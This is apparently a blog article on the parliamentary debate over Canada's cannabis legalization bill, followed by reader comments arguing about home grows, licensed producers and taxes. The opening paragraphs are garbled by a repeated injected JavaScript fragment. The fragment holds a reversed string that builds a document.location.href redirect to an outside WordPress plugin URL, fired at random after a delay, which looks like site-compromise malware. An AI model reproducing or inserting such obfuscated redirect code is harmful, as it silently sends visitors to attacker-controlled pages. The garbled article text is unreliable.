When cannabis was made illegal in Canada 94 years ago, it was done so without any parliamentary debate. Unfortunately the debate surrounding cannabis’ legalization seems toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be as flawed as the bill itself, which favours using police powers toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to protect Licensed Producer market share and relies on sketchy science toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to scare.

Multiple members of the House reference an article by the CMAJ, “Cannabis legislation fails toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to protect Canada’s youth.” The article was written with no independent study and was based on flawed review methodology. It's sad that Marc and Jodie Emery blindly put their trust in Trudeau and are now suffering the consequences. After Marc's libertarian past I'm surprised he was this easily duped by a politician. Government isn't looking out for the individuals best interest, it doesn't matter it's if Conservative or Liberal.

Way to many 'new and stronger laws' its a crock of shit for recreational users. Fake Legalization is all they are offering. Way harsher penalties for any amount that falls outside their limit. They need to stop calling Canadian Cannabis Farmers 'black market criminals". The LP's are the cartels here destroying the free industry around this plant.

  19. Practice says:

"To reduce illegal activities in relation to cannabis" So all the raids on peaceful people.

  20. Iskra Suah says:

Are conservative really that stupid? First of all, you can grow cannabis under artificial lights, in a secured grow room. But even still, lets say an adult chooses to grow outdoors or "in their kitchen" (which isn't likely, cuz it won't flower in a window sill very well), its not like kids can just go and pick a bud right off the plant and smoke it right away. There is a process of drying and curing. Plus, if a kid eats a leaf, they won't get high at all, at worst they will have a tummy ache. Unlike of course many other house plants which can be poisonous. When you agree against home grows, you argue for big corporations charging outrageous prices. And you look ignorant.

When they say its legal,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,well don't be surprised when they control it all, all to benefit them the system and money for the govt………………….They are tired of people for decades now making money off of something that was illegal……………………so they want to control and regulate your butts so hard u can't sit down……………………..Trudeau u people trusted trudeau,,,,,,,,,,,,,,,,,,,,how that work out for ya……………………….remember folks in the real world their pros and cons……………………….You are starting to see the cons, to the whole pot legal matter………………………………………boom…………………Move to the states………………………go figure.

  25. D N says:

Where is the debates on prescription medication addiction?

  26. Michael Oleary says:

Here in Washington and Oregon legalization put the dealers out of business even though you could buy at half the price. People are willing to pay the extra taxes for the added variety, quality control, safety and convenience.

  27. Alien Grey says:

Why are they so concerned with how much money criminals make? Criminals making money harms nobody, when it's a non-violent and non-property related crime. Kind of like prostitution. Who the hell cares how much money a ho makes? Is the Govt jealous? I don't get it. Apparently just mad that they're being cheated out of some more taxes to squander. And what do they intend to use the tax money for? Supposedly drug rehab programs, for Oxycontin addicts I presume. So they want to rob weed users to pay to clean up the mess caused by the pharmas. Why not just hit the pharmas directly? Can't skim anything that way? I think there are already laws against tax evasion. Should murder be legalized to keep hitmen from profiting?
